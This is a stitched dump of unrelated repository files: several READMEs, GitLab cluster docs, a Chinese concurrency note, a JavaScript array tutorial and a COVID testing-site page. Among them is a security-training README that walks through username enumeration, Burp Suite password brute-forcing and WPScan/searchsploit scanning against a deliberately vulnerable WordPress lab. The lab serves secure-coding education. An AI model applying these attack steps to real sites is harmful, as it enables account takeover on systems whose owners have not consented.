异步回调方案 典型如NodeJS,遇到阻塞的情况,比如网络调用,则注册一个回调方法(其实还包括了一些上下文数据对象)给IO调度器(linux下是libev,调度器在另外的线程里),当前线程就被释放了,去干别的事情了。等数据准备好,调度器会将结果传递给回调方法然后执行,执行其实不在原来发起请求的线程里了,但对用户来说无感知。但这种方式的问题就是很容易遇到callback hell,因为所有的阻塞操作都必须异步,否则系统就卡死了。还有就是异步的方式有点违反人类思维习惯,人类还是习惯同步的方式。
GreenThread/Coroutine/Fiber方案 这种方案其实和上面的方案本质上区别不大,关键在于回调上下文的保存以及执行机制。为了解决回调方法带来的难题,这种方案的思路是写代码的时候还是按顺序写,但遇到IO等阻塞调用时,将当前的代码片段暂停,保存上下文,让出当前线程。等IO事件回来,然后再找个线程让当前代码片段恢复上下文继续执行,写代码的时候感觉好像是同步的,仿佛在同一个线程完成的,但实际上系统可能切换了线程,但对程序无感。
[并发之痛 Thread,Goroutine,Actor](http://jolestar.com/parallel-programming-model-thread-goroutine-actor/) | 48.076923 | 248 | 0.844 | yue_Hant | 0.345122 |
149d51f17841642d3f3a5f10615d6f6ccf6e4a85 | 38 | md | Markdown | README.md | qacwnfq/vim-config | 64e99cf03f0a3c7f3b877dd97606283df26055ce | [
"MIT"
] | null | null | null | README.md | qacwnfq/vim-config | 64e99cf03f0a3c7f3b877dd97606283df26055ce | [
"MIT"
] | null | null | null | README.md | qacwnfq/vim-config | 64e99cf03f0a3c7f3b877dd97606283df26055ce | [
"MIT"
] | null | null | null | # vim-config
Playing around with vim.
| 12.666667 | 24 | 0.763158 | eng_Latn | 0.993256 |
149df5248c8801451968c336004a21bd653ee046 | 2,810 | md | Markdown | doc/user/project/clusters/multiple_kubernetes_clusters.md | nowkoai/test | 7aca51cce41acd7ec4c393d1bb1185a4a2ca1d07 | [
"MIT"
] | null | null | null | doc/user/project/clusters/multiple_kubernetes_clusters.md | nowkoai/test | 7aca51cce41acd7ec4c393d1bb1185a4a2ca1d07 | [
"MIT"
] | 2 | 2020-10-03T01:57:44.000Z | 2020-11-05T15:14:35.000Z | doc/user/project/clusters/multiple_kubernetes_clusters.md | nowkoai/test | 7aca51cce41acd7ec4c393d1bb1185a4a2ca1d07 | [
"MIT"
] | null | null | null | ---
stage: Configure
group: Configure
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments
---
# Multiple clusters per project with cluster certificates (DEPRECATED) **(FREE)**
> - Introduced in GitLab 10.3
> - [Moved](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/35094) from GitLab Premium to GitLab Free in 13.2.
> - [Deprecated](https://gitlab.com/groups/gitlab-org/configure/-/epics/8) in GitLab 14.5.
WARNING:
Using multiple Kubernetes clusters for a single project **with cluster
certificates** was [deprecated](https://gitlab.com/groups/gitlab-org/configure/-/epics/8) in GitLab 14.5.
To connect clusters to GitLab, use the [GitLab agent](../../../user/clusters/agent/index.md).
You can associate more than one Kubernetes cluster to your
project. That way you can have different clusters for different environments,
like development, staging, production, and so on.
Add another cluster, like you did the first time, and make sure to
[set an environment scope](#setting-the-environment-scope) that
differentiates the new cluster from the rest.
## Setting the environment scope
When adding more than one Kubernetes cluster to your project, you need to differentiate
them with an environment scope. The environment scope associates clusters with [environments](../../../ci/environments/index.md) similar to how the
[environment-specific CI/CD variables](../../../ci/variables/index.md#limit-the-environment-scope-of-a-cicd-variable) work.
The default environment scope is `*`, which means all jobs, regardless of their
environment, use that cluster. Each scope can be used only by a single cluster
in a project, and a validation error occurs if otherwise. Also, jobs that don't
have an environment keyword set can't access any cluster.
For example, let's say the following Kubernetes clusters exist in a project:
| Cluster | Environment scope |
| ----------- | ----------------- |
| Development | `*` |
| Production | `production` |
And the following environments are set in
[`.gitlab-ci.yml`](../../../ci/yaml/index.md):
```yaml
stages:
- test
- deploy
test:
stage: test
script: sh test
deploy to staging:
stage: deploy
script: make deploy
environment:
name: staging
url: https://staging.example.com/
deploy to production:
stage: deploy
script: make deploy
environment:
name: production
url: https://example.com/
```
The results:
- The Development cluster details are available in the `deploy to staging`
job.
- The production cluster details are available in the `deploy to production`
job.
- No cluster details are available in the `test` job because it doesn't
define any environment.
| 36.025641 | 178 | 0.736299 | eng_Latn | 0.976018 |
149dfa99a27189200324687fd98d08d2ab796639 | 352 | md | Markdown | news/_posts/2018-06-24-rez-severn.md | MasYaroslav/old | 37f5887e824d8cac687b14c8734b50acdb6ed58f | [
"MIT"
] | null | null | null | news/_posts/2018-06-24-rez-severn.md | MasYaroslav/old | 37f5887e824d8cac687b14c8734b50acdb6ed58f | [
"MIT"
] | null | null | null | news/_posts/2018-06-24-rez-severn.md | MasYaroslav/old | 37f5887e824d8cac687b14c8734b50acdb6ed58f | [
"MIT"
] | null | null | null | ---
layout: post
title: "Итоговый протокол бревета 300 км 'Северный'"
---
Участников и волонтеров поздравляем с завершением бревета!

Просьба к участникам - проверить результаты. Если у кого-то ошибка - напишите. Завтра протокол отправим на регистрацию.

| 32 | 121 | 0.755682 | rus_Cyrl | 0.799751 |
149e6de4696cbba8b21e0baec082e01d8a10dd90 | 2,492 | md | Markdown | README.md | Andre-Williams22/Reinforcement-Learning-Agent | dd618b44c76d516c38cce36880e59102ca4148f4 | [
"MIT"
] | null | null | null | README.md | Andre-Williams22/Reinforcement-Learning-Agent | dd618b44c76d516c38cce36880e59102ca4148f4 | [
"MIT"
] | null | null | null | README.md | Andre-Williams22/Reinforcement-Learning-Agent | dd618b44c76d516c38cce36880e59102ca4148f4 | [
"MIT"
] | 2 | 2021-03-24T00:05:17.000Z | 2022-03-28T01:56:33.000Z | <p align="center">
<h1>Alpaca Reinforcement Learning Agent </h1>
<br>
<br>
A tool to automate trading and investing.
Built by: Jerome Schmidt, Andre Williams, and Liya Sileshi Tilahun
[Presentation](https://drive.google.com/file/d/1iKW_uxNKN2yIG1RkcCShZDt60yDb1gEf/view?usp=sharing)
</p>
<p align="center">
<a href="#" target="_blank">
<img alt="License: MIT" src="https://img.shields.io/badge/License-MIT-yellow.svg" />
</a>
</p>
<br>
## 🚀 Getting Started
## Prerequisites
* python3.7
## 💻 Local Development
```bash
# clone the repo
git clone https://github.com/Andre-Williams22/Reinforcement-Learning-Agent
```
```bash
# cd into the repo
cd Reinforecement-Learning-Agent
```
```bash
# create a virtual environment
python3.7 -m venv venv
```
```bash
# Activate virtual environment
source venv/bin/activate
```
```bash
# Install the requirements
pip3 install -r requirements.txt
```
```bash
# cd into the program locally
cd trading_agent
```
```bash
# run the program
python3 trade.py
```
```bash
# Only train the model
python3 run_DRL.py
```
## Project Goals
1. Build a Reinforcement Learning Algorithm
2. Connect algorithm with real-time data
3. Setup algorithm with a brokerage to take real positions in the market
4. Connect algorithm to a scheduler
## 📝 License
By contributing, you agree that your contributions will be licensed under its MIT License.
In short, when you submit code changes, your submissions are understood to be under the same [MIT License](http://choosealicense.com/licenses/mit/) that covers the project. Feel free to contact the maintainers if that's a concern.
## Credit and Acknowledgment
1. https://towardsdatascience.com/finrl-for-quantitative-finance-tutorial-for-multiple-stock-trading-7b00763b7530
1. [Finding most volatile stocks](https://towardsdatascience.com/find-the-highest-moving-hidden-stocks-of-the-day-with-python-aab0d7bfe5ff)
## Contributors
Anyone is welcome to contribute!
<table>
<tr>
<td align="center"><a href="https://github.com/Andre-Williams22"><br /><sub><b>Andre Williams</b></sub></a><br /><a href="https://github.com/Andre-Williams22/msconsole/commits?author=Andre-Williams22" title="Code">💻</a></td>
</tr>
<tr>
<td align="center"><a href="https://github.com/liyaSileshi"><br /><sub><b>Liya Tilahun</b></sub></a><br /><a title="Code">👩🏽💻</a></td>
</tr>
<tr>
<td align="center"><a href="#"><br /><sub><b>Jerome Schmidt</b></sub></a><br /><a title="Code">💻</a></td>
</tr>
</table>
| 26.795699 | 230 | 0.712681 | eng_Latn | 0.647246 |
149e7ef42a65e41ecce9ebe7b62cfb0c9466025c | 1,579 | md | Markdown | docs/vs-2015/extensibility/debugger/reference/idebugmessageevent2-setresponse.md | klmnden/visualstudio-docs.tr-tr | 82aa1370dab4ae413f5f924dad3e392ecbad0d02 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-09-01T20:45:52.000Z | 2020-09-01T20:45:52.000Z | docs/vs-2015/extensibility/debugger/reference/idebugmessageevent2-setresponse.md | klmnden/visualstudio-docs.tr-tr | 82aa1370dab4ae413f5f924dad3e392ecbad0d02 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/extensibility/debugger/reference/idebugmessageevent2-setresponse.md | klmnden/visualstudio-docs.tr-tr | 82aa1370dab4ae413f5f924dad3e392ecbad0d02 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: IDebugMessageEvent2::SetResponse | Microsoft Docs
ms.date: 11/15/2016
ms.prod: visual-studio-dev14
ms.technology: vs-ide-sdk
ms.topic: reference
f1_keywords:
- IDebugMessageEvent2::SetResponse
helpviewer_keywords:
- IDebugMessageEvent2::SetResponse method
- SetResponse method
ms.assetid: 2a5e318d-3225-4abd-83f1-28323baff6c0
caps.latest.revision: 11
ms.author: gregvanl
manager: jillfra
ms.openlocfilehash: cac96c0f5476694b18884fd8d7713a2bec877aef
ms.sourcegitcommit: 08fc78516f1107b83f46e2401888df4868bb1e40
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 05/15/2019
ms.locfileid: "65685906"
---
# <a name="idebugmessageevent2setresponse"></a>IDebugMessageEvent2::SetResponse
[!INCLUDE[vs2017banner](../../../includes/vs2017banner.md)]
İleti kutusu gelen yanıt ayarlar.
## <a name="syntax"></a>Sözdizimi
```cpp#
HRESULT SetResponse(
DWORD dwResponse
);
```
```csharp
int SetResponse(
uint dwResponse
);
```
#### <a name="parameters"></a>Parametreler
`dwResponse`
[in] Win32 kuralları kullanılarak yanıt belirtir `MessageBox` işlevi. Bkz: [AfxMessageBox](https://msdn.microsoft.com/library/d66d0328-cdcc-48f6-96a4-badf089099c8) Ayrıntılar için işlevi.
## <a name="return-value"></a>Dönüş Değeri
Başarılı olursa döndürür `S_OK`; Aksi takdirde bir hata kodu döndürür.
## <a name="see-also"></a>Ayrıca Bkz.
[IDebugMessageEvent2](../../../extensibility/debugger/reference/idebugmessageevent2.md)
[AfxMessageBox](https://msdn.microsoft.com/library/d66d0328-cdcc-48f6-96a4-badf089099c8)
| 30.365385 | 190 | 0.749842 | tur_Latn | 0.175319 |
149e97277c0c9e34ba2f9d021f4487f9572cbbe3 | 2,188 | md | Markdown | docs/sdk/sdk-by-examples/simple-governance/app-constructor.md | jessysaurusrex/cosmos-sdk | fcd32c2f3df6393d351b506c7af8c2bbb5688b33 | [
"Apache-2.0"
] | null | null | null | docs/sdk/sdk-by-examples/simple-governance/app-constructor.md | jessysaurusrex/cosmos-sdk | fcd32c2f3df6393d351b506c7af8c2bbb5688b33 | [
"Apache-2.0"
] | null | null | null | docs/sdk/sdk-by-examples/simple-governance/app-constructor.md | jessysaurusrex/cosmos-sdk | fcd32c2f3df6393d351b506c7af8c2bbb5688b33 | [
"Apache-2.0"
] | null | null | null | ## Application constructor
**File: [`app/app.go`](https://github.com/cosmos/cosmos-sdk/blob/fedekunze/module_tutorial/examples/simpleGov/app/app.go)**
Now, we need to define the constructor for our application.
```go
func NewSimpleGovApp(logger log.Logger, db dbm.DB) *SimpleGovApp
```
In this function, we will:
- Create the codec
```go
var cdc = MakeCodec()
```
- Instantiate our application. This includes creating the keys to access each of the substores.
```go
// Create your application object.
var app = &SimpleGovApp{
BaseApp: bam.NewBaseApp(appName, cdc, logger, db),
cdc: cdc,
capKeyMainStore: sdk.NewKVStoreKey("main"),
capKeyAccountStore: sdk.NewKVStoreKey("acc"),
capKeyStakingStore: sdk.NewKVStoreKey("stake"),
capKeySimpleGovStore: sdk.NewKVStoreKey("simpleGov"),
}
```
- Instantiate the keepers. Note that keepers generally need access to other module's keepers. In this case, make sure you only pass an instance of the keeper for the functionality that is needed. If a keeper only needs to read in another module's store, a read-only keeper should be passed to it.
```go
app.bankKeeper = bank.NewBaseKeeper(app.accountMapper)
app.stakeKeeper = simplestake.NewKeeper(app.capKeyStakingStore, app.bankKeeper,app.RegisterCodespace(simplestake.DefaultCodespace))
app.simpleGovKeeper = simpleGov.NewKeeper(app.capKeySimpleGovStore, app.bankKeeper, app.stakeKeeper, app.RegisterCodespace(simpleGov.DefaultCodespace))
```
- Declare the handlers.
```go
app.Router().
AddRoute("bank", bank.NewHandler(app.bankKeeper)).
AddRoute("simplestake", simplestake.NewHandler(app.stakeKeeper)).
AddRoute("simpleGov", simpleGov.NewHandler(app.simpleGovKeeper))
```
- Initialize the application.
```go
// Initialize BaseApp.
app.MountStoresIAVL(app.capKeyMainStore, app.capKeyAccountStore, app.capKeySimpleGovStore, app.capKeyStakingStore)
app.SetAnteHandler(auth.NewAnteHandler(app.accountMapper, app.feeCollectionKeeper))
err := app.LoadLatestVersion(app.capKeyMainStore)
if err != nil {
cmn.Exit(err.Error())
}
return app
``` | 35.868852 | 296 | 0.726691 | eng_Latn | 0.342024 |
149eacb64da2e113ffa099e088205e5491b0b20e | 540 | md | Markdown | articles/human-resources/includes/new-licensing.md | vviptg/Dynamics-365-Operations.nb-no | 826fb5a428b9e66f854a116edb0351c4a1d5619e | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-05-18T17:14:36.000Z | 2021-04-20T21:13:46.000Z | articles/human-resources/includes/new-licensing.md | vviptg/Dynamics-365-Operations.nb-no | 826fb5a428b9e66f854a116edb0351c4a1d5619e | [
"CC-BY-4.0",
"MIT"
] | 6 | 2017-12-12T12:48:00.000Z | 2019-04-30T11:45:53.000Z | articles/human-resources/includes/new-licensing.md | vviptg/Dynamics-365-Operations.nb-no | 826fb5a428b9e66f854a116edb0351c4a1d5619e | [
"CC-BY-4.0",
"MIT"
] | 3 | 2019-10-12T18:16:06.000Z | 2022-01-28T03:23:59.000Z | ---
ms.openlocfilehash: fc878bda211eb9b3462a3629e5997a7eb906900db20ddc600a5cc956da55c413
ms.sourcegitcommit: 42fe9790ddf0bdad911544deaa82123a396712fb
ms.translationtype: HT
ms.contentlocale: nb-NO
ms.lasthandoff: 08/05/2021
ms.locfileid: "6719050"
---
> [!IMPORTANT]
> Dynamics 365 for Finance and Operations blir nå lisensiert som Dynamics 365 Finance og Dynamics 365 Supply Chain Management. Hvis du vil ha mer informasjon om disse lisensendringene, kan du se [Oppdatering av lisensiering for Dynamics 365](/dynamics365/licensing/update). | 54 | 273 | 0.831481 | nob_Latn | 0.331733 |
149ecbd4b9c2fa4da8378fe563052db8ee32592b | 209 | md | Markdown | README.md | deomsj/Presentation-Design-Patterns | 196d7f843e9b466bddfc7eeb9cfeb5b18a8714d7 | [
"MIT"
] | null | null | null | README.md | deomsj/Presentation-Design-Patterns | 196d7f843e9b466bddfc7eeb9cfeb5b18a8714d7 | [
"MIT"
] | null | null | null | README.md | deomsj/Presentation-Design-Patterns | 196d7f843e9b466bddfc7eeb9cfeb5b18a8714d7 | [
"MIT"
] | null | null | null | # Design Patterns
## Presentation
See the reveal.js presentation here: [https://captechconsulting.github.io/Presentation-Design-Patterns/](https://captechconsulting.github.io/Presentation-Design-Patterns/)
| 29.857143 | 171 | 0.803828 | yue_Hant | 0.173161 |
149ee6a57cb08e4a1648ee65bf5ac9df4dd018f7 | 1,365 | md | Markdown | README.md | Indrajeet619/Invoice-Loans | f9511db63d29a40567fe00d5fb5cbf4c14093e64 | [
"Apache-2.0"
] | 1 | 2021-11-04T18:11:57.000Z | 2021-11-04T18:11:57.000Z | README.md | Indrajeet619/Invoice-Loans | f9511db63d29a40567fe00d5fb5cbf4c14093e64 | [
"Apache-2.0"
] | null | null | null | README.md | Indrajeet619/Invoice-Loans | f9511db63d29a40567fe00d5fb5cbf4c14093e64 | [
"Apache-2.0"
] | null | null | null | # Invoice-Loans
Invoice Discounting Loans for small businesses
Small Businesses have hard time getting non collateral loans. Also, even when they receive loans they get small funding amount. Banks often reject farmer's loans as they need asset as collateral and don't want to give large funding as they don't want to take risk. Our system helps entrepreneurs to get non collateral loans and still get high amount of loan funding from lenders in Kiva platform.
1. A farmer can upload image of invoice of customer order for example $1000 order and get zero interest funding from Kiva platform. With that funding he can buy necessary raw materials like fertilizers, agriculture equipment, etc needed to fulfil his customer order. Using this system, small businesses can get high loan amount and lenders can also lend risk free.
2. And After customer pays back, the amount is added to lenders account
3. Advantage of Invoice discounting is It’s available to small-sized businesses that might have been denied traditional bank finance in the past. And businesses don't have to provide assets as collateral.
4. It offers a flexible finance solution as per business's requirements and businesses can get funding in short time
5. All this process happens digitally and loan can be given in few days.
Install dependencies using NPM install, and run node server.js
| 105 | 397 | 0.807326 | eng_Latn | 0.99974 |
149fa50228a8d22e973d05dbfe3925f6f8f2e40b | 1,687 | md | Markdown | Practice/javascript-beginners-tutorial/md/11.06.01.js.array.access.loop.md | side-projects-42/INTERVIEW-PREP-COMPLETE | 627a3315cee4bbc38a0e81c256f27f928eac2d63 | [
"MIT"
] | 13 | 2021-03-11T00:25:22.000Z | 2022-03-19T00:19:23.000Z | Practice/javascript-beginners-tutorial/md/11.06.01.js.array.access.loop.md | side-projects-42/INTERVIEW-PREP-COMPLETE | 627a3315cee4bbc38a0e81c256f27f928eac2d63 | [
"MIT"
] | 160 | 2021-04-26T19:04:15.000Z | 2022-03-26T20:18:37.000Z | Practice/javascript-beginners-tutorial/md/11.06.01.js.array.access.loop.md | side-projects-42/INTERVIEW-PREP-COMPLETE | 627a3315cee4bbc38a0e81c256f27f928eac2d63 | [
"MIT"
] | 12 | 2021-04-26T19:43:01.000Z | 2022-01-31T08:36:29.000Z | 11. # Array
1. An Array is special type of variable/object which \`consists of / stores multiple values\`
1. Arrays are complex variables that allow us to store more than one value or a group of values under a single variable name
1. Arrays are defined with \`square brackets \[ \]\` and with \`new\` keyword
1. Array items are normally separated with \`commas ,\`
1. Arrays are zero-indexed i.e. the first element of an array is at index/position 0
1. Array is ordered collection, where we have a 0th, 1st, a 2nd, and so on elements
1. Each value (an \`element\`) in an array has a \`numeric position\`, known as its \`index\`, \`starts from 0\`, so that the first array element is arr\[0\] not arr\[1\]
## Different ways to create/define an Array:
1. By array literal
2. By creating instance of Array directly (using new keyword)
3. By using an Array constructor (using new keyword)
## 11.06. Accessing/Looping through an Array Elements
- Array elements can be accessed by their \`index using the square bracket notation ie. \[index\]\`
- Arrays are \`zero-indexed\` i.e. the first element of an array is at index/position 0
- An array is \`ordered collection\`, where we have a 0th, 1st, a 2nd, and so on elements
- Each value (an \`element\`) in an array has a \`numeric position\`, known as its \`index\`, \`starts from 0\`, so that the first array element is \`arr\[0\]\` not arr\[1\]
- One can use \`for loop\` in co-ordination with array \`length\` property to access each element of an array in sequential order
- myarray\[indexNumber\], myarray\[0\] // get first array element
## Example Output: Loop through an Array Elements - Different JavaScript Frameworks
| 62.481481 | 173 | 0.720806 | eng_Latn | 0.998825 |
149fd8f1b4da674eff8f570b5cb25c018f7d923e | 8,128 | md | Markdown | owasp-top10-2017-apps/a6/misconfig-wordpress/README.md | REPTILEHAUS/secDevLabs | 2b396d10f050894cbf3506c24a1e8f3f84338698 | [
"BSD-3-Clause"
] | 1 | 2020-07-25T19:11:48.000Z | 2020-07-25T19:11:48.000Z | owasp-top10-2017-apps/a6/misconfig-wordpress/README.md | paralelo14/secDevLabs | 2b396d10f050894cbf3506c24a1e8f3f84338698 | [
"BSD-3-Clause"
] | null | null | null | owasp-top10-2017-apps/a6/misconfig-wordpress/README.md | paralelo14/secDevLabs | 2b396d10f050894cbf3506c24a1e8f3f84338698 | [
"BSD-3-Clause"
] | 1 | 2020-01-10T12:52:48.000Z | 2020-01-10T12:52:48.000Z | # Vulnerable Wordpress Misconfig
<p align="center">
<img src="images/banner.png"/>
</p>
This is a simple Wordpress web application that contains an example of a Security Misconfiguration vulnerability and it's main goal is to describe how a malicious user could exploit multiple Security Misconfiguration vulnerabilities intentionally installed on SecWeb.
## Index
- [Definition](#what-is-security-misconfiguration)
- [Setup](#setup)
- [Attack narrative](#attack-narrative)
- [Objectives](#secure-this-app)
- [Solutions](#pr-solutions)
- [Contributing](#contributing)
## What is Security Misconfiguration?
Security misconfiguration can happen at any level of an application stack, including the network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers, or storage. Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options, etc.
The main goal of this app is to discuss how **Security Misconfiguration** vulnerabilities can be exploited and to encourage developers to send secDevLabs Pull Requests on how they would mitigate these flaws.
## Setup
To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2017-apps/a6/misconfig-wordpress
```
```sh
make install
```
Then simply visit [localhost:8000][App] ! 😆
## Get to know the app 📄
To properly understand how this application works, you can try to:
- Visit it's homepage!
## Attack narrative
Now that you know the purpose of this app, what could possibly go wrong? The following section describes how an attacker could identify and eventually find sensitive information about the app or it's users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜
### 👀
#### Verbose error message allows for username enumeration
It's possible to reach the site through the HTTP port 8000, as shown by the image below:
<p align="center">
<img src="images/banner.png"/>
</p>
Having a closer look at what's written bellow `SECWEB` we have a sign that the site might be using the WordPress CMS. We can confirm that suspicion by trying to access the `/wp-admin` page. As we can see from the image below, our suspicion is confirmed:
<p align="center">
<img src="images/attack1.png"/>
</p>
An attacker could try to log in with the username: `admin` and realize, through the error message, that `admin` is a valid user, as depicted by the image below:
<p align="center">
<img src="images/attack2.png"/>
</p>
### 🔥
At this moment, an attacker could use [Burp Suite](https://portswigger.net/burp) to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to Intruder, as shown bellow:
<p align="center">
<img src="images/attack10.png"/>
</p>
In `Positions` tab, all fields must be cleared first via `Clear §` button. To set `pwd` to change acording to each password from our dictionary wordlist, simply click on `Add §` button after selecting it:
<p align="center">
<img src="images/attack11.png"/>
</p>
If a valid password is found, the application may process new cookies and eventually redirect the flow to other pages. To guarantee that the brute force attack follows this behavior, set `Always` into `Follow Redirections` options in `Options` tab, as shown bellow:
<p align="center">
<img src="images/attack13.png"/>
</p>
In `Payloads` tab, simply choose the wordlist from `Load...` option and then the attack may be performed via `Start attack` button:
<p align="center">
<img src="images/attack12.png"/>
</p>
After sending at around 200 requests to try and obtain a valid admin password, it is possible to see from the image below that the app redirected us when the password `password` was used, thus giving us evidence that it might be the `admin` password.
<p align="center">
<img src="images/attack3.png"/>
</p>
The suspicion was confirmed when trying to log in with these credentials. As shown below:
<p align="center">
<img src="images/attack3.1.png"/>
</p>
-----
### 👀
#### Outdated WordPress is vulnerable to an authenticated arbitrary file deletion
Now that we know we're dealing with a WordPress, we can use the [WPScan] tool to perform a sweep in the app in search for known vulnerabilities. The following command can be used to install it:
```sh
brew install wpscan
```
And then use this command to start a new simple scan:
```sh
wpscan -u localhost:8000
```
<p align="center">
<img src="images/attack4.png"/>
</p>
### 🔥
As seen from the image above, the tool found out that the CMS version is outdated and vulnerable to an Authenticated Arbitrary File Deletion. By using [searchsploit] tool an attacker could find a [malicious code] to exploit this vulnerability.
To install this tool, simply type the following in your OSX terminal:
```sh
brew install exploitdb
```
Then simply search for the version of the CMS found:
```sh
searchsploit wordpress 4.9.6
```
<p align="center">
<img src="images/attack5.png"/>
</p>
----
## 👀
#### Security misconfiguration allows for a browseable directory on the server
By having another look at the results from [WPScan], it's possible to see that the tool found a browseable directory in the app: `/wp-content/uploads/`, as we can see from the image below:
<p align="center">
<img src="images/attack6.png"/>
</p>
## 🔥
We can confirm that the directory is browseable by accessing it through a web browser, as shown by the following image:
<p align="center">
<img src="images/attack7.png"/>
</p>
----
## 👀
#### Misconfigured headers gives away unnecessary information about the server
Using [Nikto] tool to perform a security check scan, it's possible to see that there are multiple points of attention regarging security headers.
To install it, you can use the following command in your OSX terminal:
```sh
brew install nikto
```
Then scan the web app using:
```sh
nikto -h http://localhost:8000/
```
<p align="center">
<img src="images/attack8.png"/>
</p>
Now, by doing the following curl command to check the HTTP headers of the application, we can confirm that it indeed exposes the PHP version installed, as shown by the image below:
<p align="center">
<img src="images/attack9.png"/>
</p>
----
## Secure this app
How would you mitigate this vulnerability? After your changes, an attacker should not be able to:
* See verbose error messages
* Log in with default credentials
* See verbose tokens
* Find an outdated CMS version
Note: In this particular app, due to how it works, you can simply write down the changes you would make to mitigate those vulnerabilites and submit it as a pull request.
## PR solutions
[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22Vuln+Wordpress+Misconfig%22)!
## Contributing
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
[Docker Install]: https://docs.docker.com/install/
[Docker Compose Install]: https://docs.docker.com/compose/install/
[App]: http://localhost:8000
[wordlist]: https://github.com/danielmiessler/SecLists/blob/master/Passwords/UserPassCombo-Jay.txt
[wpscan]:https://wpscan.org/
[malicious code]: https://www.exploit-db.com/exploits/44949
[nikto]: https://cirt.net/Nikto2
[searchsploit]: https://www.exploit-db.com/searchsploit
| 35.649123 | 413 | 0.745817 | eng_Latn | 0.988493 |
149ff20c3a611b58bc714966079b1809d39226ed | 1,047 | md | Markdown | README.md | SirPumpkin301/HW.17-Workout-Tracker | ec7bedc50a7e3ddc393c414032b41d6ea2ac276c | [
"MIT"
] | null | null | null | README.md | SirPumpkin301/HW.17-Workout-Tracker | ec7bedc50a7e3ddc393c414032b41d6ea2ac276c | [
"MIT"
] | null | null | null | README.md | SirPumpkin301/HW.17-Workout-Tracker | ec7bedc50a7e3ddc393c414032b41d6ea2ac276c | [
"MIT"
] | null | null | null | # Unit 17: Workout Tracker

Allows the user to track a workout. Various attributes of the workout can be stored. I did the best I could.
## Description
Created a fitness tracking app utilizing Node.js, Express.js, MongoDB, Heroku and Mongoose. Allows the user to track their workouts and save them in a database.
## Live site:
https://hw17workouttracker.herokuapp.com/
## Images
Image of main view:

Image of adding exercises:

Image of Workout Dashboard

## Installation
To install necessary dependencies, run the following command:
```
npm i
```
You will need to run "npm i" to recieve all the required node modules.
## Usage
The primary reason for this app was because it was a homework requirement.
| 26.846154 | 160 | 0.758357 | eng_Latn | 0.970788 |
14a0a87e09e4f21ad32ebd86064afdef3e7f8ca8 | 3,107 | md | Markdown | src/locations/location-264.md | designtocombatcovid19/testinglocations | 498794cc6433073b5f8dcc76a2adbc7457bfdaee | [
"MIT"
] | null | null | null | src/locations/location-264.md | designtocombatcovid19/testinglocations | 498794cc6433073b5f8dcc76a2adbc7457bfdaee | [
"MIT"
] | 4 | 2021-03-02T01:16:23.000Z | 2022-03-08T23:19:34.000Z | src/locations/location-264.md | designtocombatcovid19/testinglocations | 498794cc6433073b5f8dcc76a2adbc7457bfdaee | [
"MIT"
] | null | null | null | ---
layout: location-page
date: Last Modified
description: "Local COVID-19 testing is available at Urgent Care of Kansas City in Independence, Missouri, USA."
permalink: "locations/missouri/independence/urgent-care-of-kansas-city/"
tags:
- locations
- missouri
title: Urgent Care of Kansas City
uniqueName: urgent-care-of-kansas-city
state: Missouri
stateAbbr: MO
hood: "Independence"
address: "4741 Arrowhead Dr, Suite B"
city: "Independence"
zip: "64055"
zipsNearby: "66002 66006 66007 66008 66012 66013 66016 66018 66019 66020 66021 66024 66025 66026 66030 66036 66101 66102 66103 66104 66105 66106 66109 66110 66111 66112 66113 66115 66117 66118 66119 66160 66040 66041 66042 66044 66045 66046 66047 66049 66027 66043 66048 66050 66052 66053 66054 66060 66031 66051 66061 66062 66063 66064 66066 66067 66070 66071 66073 66079 66201 66202 66203 66204 66205 66206 66207 66208 66209 66210 66211 66212 66213 66214 66215 66216 66217 66218 66219 66220 66221 66222 66223 66224 66225 66226 66227 66250 66251 66276 66282 66283 66285 66286 66083 66085 66086 66090 66092 66097 64720 64401 64001 64620 64422 64722 64723 64725 64011 64012 64726 64013 64014 64015 64622 64623 64624 64625 64016 64730 64017 64018 64429 64633 64019 64733 64654 64430 64734 64735 64020 64021 64436 64637 64739 64638 64439 64440 64022 64742 64743 64443 64444 64024 64073 64028 64448 64746 64640 64747 64454 64029 64030 64034 64644 64035 64701 64459 64036 64037 64040 64048 64050 64051 64052 64053 64054 64055 64056 64057 64058 64101 64102 64105 64106 64108 64109 64110 64111 64112 64113 64114 64116 64117 64118 64119 64120 64121 64123 64124 64125 64126 64127 64128 64129 64130 64131 64132 64133 64134 64136 64137 64138 64139 64141 64144 64145 64146 64147 64148 64149 64150 64151 64152 64153 64154 64155 64156 64157 64158 64161 64163 64164 64165 64166 64167 64168 64170 64171 64179 64180 64184 64187 64188 64190 64191 64195 64196 64197 64198 64199 64999 64060 64649 64650 64061 64465 64062 64002 64063 64064 64065 64081 64082 64086 64761 64066 64067 64068 64069 64070 64656 64469 64071 64072 64770 64664 64074 64668 64680 64075 64076 64077 64474 64078 64079 64477 64080 64671 64083 64084 64085 64484 64501 64502 64503 64504 64505 64506 64507 64508 64088 64089 64490 64090 64682 64492 64493 64788 64686 64092 64093 64096 64497 64097 64098 64689 65321 65323 65327 65332 65333 65334 65305 65336 65337 65339 65340 65351 65360 64172 64183 64185 64192 64193 64194 64944 66077 66279"
mapUrl: "http://maps.apple.com/?q=Urgent+Care+of+Kansas+City&address=4741+Arrowhead+Dr+Suite+B,Independence,Missouri,64055"
